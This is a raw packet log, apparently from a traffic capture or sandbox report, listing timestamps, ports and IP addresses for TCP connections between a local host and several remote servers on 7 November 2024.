Nov 7, 2024 07:33:29.165132046 CET	443	49918	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.165182114 CET	443	49918	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.165255070 CET	49918	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.168668032 CET	80	49926	185.215.113.43	192.168.2.4
Nov 7, 2024 07:33:29.174146891 CET	49918	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.174169064 CET	443	49918	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.174180031 CET	49918	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.174185038 CET	443	49918	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.178267002 CET	49927	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.178291082 CET	443	49927	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.178348064 CET	49927	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.178987026 CET	49927	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.178998947 CET	443	49927	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.231195927 CET	443	49919	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.241405010 CET	49919	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.241421938 CET	443	49919	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.241657972 CET	49919	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.241662979 CET	443	49919	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.370075941 CET	443	49919	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.374982119 CET	443	49919	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.375035048 CET	49919	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.414685011 CET	49919	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.414695978 CET	443	49919	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.414705038 CET	49919	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.414711952 CET	443	49919	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.458523989 CET	49928	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.458545923 CET	443	49928	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.458635092 CET	49928	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.481678963 CET	49928	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.481692076 CET	443	49928	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.624723911 CET	443	49923	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.649552107 CET	443	49920	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:29.661796093 CET	49923	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.661828995 CET	443	49923	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.662348032 CET	49923	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.662353992 CET	443	49923	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.668668985 CET	49920	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:29.668693066 CET	443	49920	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:29.669091940 CET	443	49920	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:29.674482107 CET	49920	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:29.674562931 CET	443	49920	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:29.674890041 CET	49920	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:29.719333887 CET	443	49920	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:29.763359070 CET	443	49924	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:29.764229059 CET	49924	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:29.764240026 CET	443	49924	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:29.764586926 CET	443	49924	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:29.769929886 CET	49924	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:29.769988060 CET	443	49924	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:29.770098925 CET	49924	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:29.790668964 CET	443	49923	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.790690899 CET	443	49923	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.790721893 CET	443	49923	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.790766954 CET	49923	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.790796041 CET	49923	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.803917885 CET	443	49921	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.807543039 CET	443	49922	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.809916973 CET	49923	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.809928894 CET	443	49923	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.810008049 CET	49923	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.810014009 CET	443	49923	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.812077045 CET	49921	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.812091112 CET	443	49921	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.812457085 CET	49921	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.812462091 CET	443	49921	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.812742949 CET	49922	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.812769890 CET	443	49922	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.813178062 CET	49922	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.813184023 CET	443	49922	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.815332890 CET	443	49924	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:29.827052116 CET	49929	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.827083111 CET	443	49929	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.827140093 CET	49929	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.838550091 CET	443	49920	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:29.838630915 CET	443	49920	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:29.838845015 CET	49920	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:29.850301981 CET	443	49925	184.28.90.27	192.168.2.4
Nov 7, 2024 07:33:29.850388050 CET	49925	443	192.168.2.4	184.28.90.27
Nov 7, 2024 07:33:29.863773108 CET	49929	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.863787889 CET	443	49929	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.866120100 CET	49925	443	192.168.2.4	184.28.90.27
Nov 7, 2024 07:33:29.866133928 CET	443	49925	184.28.90.27	192.168.2.4
Nov 7, 2024 07:33:29.866349936 CET	443	49925	184.28.90.27	192.168.2.4
Nov 7, 2024 07:33:29.867187977 CET	49925	443	192.168.2.4	184.28.90.27
Nov 7, 2024 07:33:29.878325939 CET	49920	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:29.878336906 CET	443	49920	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:29.906208992 CET	49930	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:29.906227112 CET	443	49930	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:29.906285048 CET	49930	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:29.906636000 CET	49930	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:29.906647921 CET	443	49930	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:29.911334038 CET	443	49925	184.28.90.27	192.168.2.4
Nov 7, 2024 07:33:29.917651892 CET	443	49927	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.925081968 CET	49927	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.925096035 CET	443	49927	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.925489902 CET	49927	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.925493956 CET	443	49927	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.930454969 CET	443	49924	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:29.930516958 CET	443	49924	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:29.930577040 CET	49924	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:29.937747002 CET	49924	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:29.937753916 CET	443	49924	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:29.938621998 CET	443	49921	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.938698053 CET	443	49921	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.938842058 CET	49921	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.938910007 CET	49921	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.938914061 CET	443	49921	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.938925028 CET	49921	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.938927889 CET	443	49921	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.939116955 CET	443	49922	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.939161062 CET	443	49922	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.939764023 CET	49922	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.939836979 CET	49922	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.939852953 CET	443	49922	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.939862967 CET	49922	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.939867973 CET	443	49922	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.963316917 CET	49931	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.963330030 CET	443	49931	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.963529110 CET	49931	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.964798927 CET	49932	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.964842081 CET	443	49932	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.965049028 CET	49932	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.965226889 CET	49932	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.965244055 CET	443	49932	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.967654943 CET	49931	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.967665911 CET	443	49931	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:30.013972998 CET	49933	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:30.013994932 CET	443	49933	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:30.014228106 CET	49933	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:30.014456034 CET	49933	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:30.014467001 CET	443	49933	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:30.062575102 CET	443	49927	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:30.062623978 CET	443	49927	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:30.062926054 CET	49927	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:30.063224077 CET	80	49926	185.215.113.43	192.168.2.4
Nov 7, 2024 07:33:30.063637018 CET	49926	80	192.168.2.4	185.215.113.43
Nov 7, 2024 07:33:30.106204033 CET	49927	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:30.106213093 CET	443	49927	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:30.106240034 CET	49927	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:30.106245041 CET	443	49927	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:30.109117031 CET	443	49925	184.28.90.27	192.168.2.4
Nov 7, 2024 07:33:30.109354019 CET	443	49925	184.28.90.27	192.168.2.4
Nov 7, 2024 07:33:30.109437943 CET	49925	443	192.168.2.4	184.28.90.27
Nov 7, 2024 07:33:30.131076097 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:30.131608963 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:30.131795883 CET	49935	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:30.131809950 CET	443	49935	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:30.132019997 CET	49935	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:30.136425018 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:30.136514902 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:30.136535883 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:30.136698961 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:30.176722050 CET	49935	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:30.176734924 CET	443	49935	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:30.177409887 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:30.182307005 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:30.191778898 CET	49925	443	192.168.2.4	184.28.90.27
Nov 7, 2024 07:33:30.191809893 CET	443	49925	184.28.90.27	192.168.2.4
Nov 7, 2024 07:33:30.191829920 CET	49925	443	192.168.2.4	184.28.90.27
Nov 7, 2024 07:33:30.191836119 CET	443	49925	184.28.90.27	192.168.2.4
Nov 7, 2024 07:33:30.198750019 CET	443	49928	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:30.199892044 CET	49928	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:30.199907064 CET	443	49928	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:30.200464964 CET	49928	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:30.200469017 CET	443	49928	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:30.325396061 CET	443	49928	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:30.325438976 CET	443	49928	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:30.325519085 CET	49928	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:30.635822058 CET	443	49929	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:30.683415890 CET	443	49932	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:30.708069086 CET	443	49931	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:30.719897032 CET	49928	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:30.719913006 CET	443	49928	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:30.736423969 CET	443	49930	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:30.737544060 CET	49929	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:30.737565041 CET	443	49929	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:30.737963915 CET	49929	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:30.737970114 CET	443	49929	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:30.739298105 CET	49932	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:30.739331961 CET	443	49932	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:30.739803076 CET	49932	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:30.739809036 CET	443	49932	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:30.749200106 CET	49931	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:30.749216080 CET	443	49931	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:30.749675989 CET	49931	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:30.749680996 CET	443	49931	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:30.755264044 CET	49930	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:30.755275965 CET	443	49930	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:30.755650043 CET	443	49930	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:30.771898031 CET	49930	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:30.771991968 CET	443	49930	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:30.772530079 CET	49930	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:30.774230003 CET	49936	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:30.774245977 CET	443	49936	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:30.774416924 CET	49936	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:30.815331936 CET	443	49930	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:30.820174932 CET	49936	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:30.820183992 CET	443	49936	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:30.837769032 CET	443	49933	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:30.863642931 CET	443	49932	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:30.863663912 CET	443	49932	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:30.863693953 CET	443	49932	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:30.863713026 CET	49932	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:30.863739014 CET	49932	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:30.869406939 CET	443	49929	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:30.869452000 CET	443	49929	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:30.869497061 CET	49929	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:30.876044989 CET	443	49931	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:30.876070976 CET	443	49931	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:30.876107931 CET	49931	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:30.876116037 CET	443	49931	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:30.876132011 CET	443	49931	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:30.876178026 CET	49931	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:30.895782948 CET	49933	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:30.895796061 CET	443	49933	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:30.896164894 CET	443	49933	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:30.903604031 CET	49932	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:30.903620958 CET	443	49932	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:30.904685020 CET	443	49935	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:30.910577059 CET	49935	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:30.910589933 CET	443	49935	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:30.911253929 CET	49935	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:30.911257982 CET	443	49935	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:30.911375999 CET	49929	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:30.911384106 CET	443	49929	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:30.911393881 CET	49929	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:30.911397934 CET	443	49929	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:30.913005114 CET	49931	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:30.913005114 CET	49931	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:30.913009882 CET	443	49931	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:30.913017988 CET	443	49931	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:30.932082891 CET	443	49930	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:30.932158947 CET	443	49930	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:30.932208061 CET	49930	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:30.946841955 CET	49933	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:30.946962118 CET	443	49933	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:31.025157928 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.025175095 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.025187969 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.025217056 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.025222063 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.025230885 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.025245905 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.025258064 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.025268078 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.025296926 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.025300026 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.025310040 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.025321007 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.025336027 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.025358915 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.030108929 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.030175924 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.030189037 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.030232906 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.030247927 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.030286074 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.036849976 CET	443	49935	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:31.036870956 CET	443	49935	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:31.036906004 CET	443	49935	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:31.036921978 CET	49935	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:31.036962032 CET	49935	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:31.044323921 CET	49930	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:31.044332027 CET	443	49930	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:31.048511028 CET	49933	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:31.066323996 CET	49935	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:31.066330910 CET	443	49935	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:31.066343069 CET	49935	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:31.066348076 CET	443	49935	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:31.109616995 CET	49933	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:31.121332884 CET	49937	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:31.121349096 CET	443	49937	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:31.121412992 CET	49937	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:31.155322075 CET	443	49933	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:31.175354958 CET	49938	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:31.175369024 CET	443	49938	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:31.175430059 CET	49938	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:31.175957918 CET	49939	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:31.175966978 CET	443	49939	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:31.176016092 CET	49939	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:31.176537991 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.176568985 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.176593065 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.176604033 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.176609039 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.176655054 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.176657915 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.176671982 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.176682949 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.176695108 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.176723957 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.176749945 CET	49937	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:31.176762104 CET	443	49937	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:31.177223921 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.177239895 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.177273989 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.177285910 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.177345991 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.177380085 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.177407980 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.177419901 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.177463055 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.177474022 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.177486897 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.177519083 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.178045988 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.178092003 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.178096056 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.178102970 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.178128004 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.178138018 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.178163052 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.178174019 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.178189039 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.178220987 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.178905964 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.178919077 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.178930044 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.178951025 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.178961039 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.178971052 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.178975105 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.178992033 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.179032087 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.179691076 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.179732084 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.181647062 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.181690931 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.181691885 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.181730986 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.187901020 CET	49940	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:31.187913895 CET	443	49940	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:31.187968969 CET	49940	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:31.188139915 CET	49940	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:31.188149929 CET	443	49940	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:31.213263035 CET	49938	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:31.213274956 CET	443	49938	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:31.214246988 CET	49939	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:31.214257002 CET	443	49939	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:31.273606062 CET	443	49933	172.240.127.234	192.168.2.4
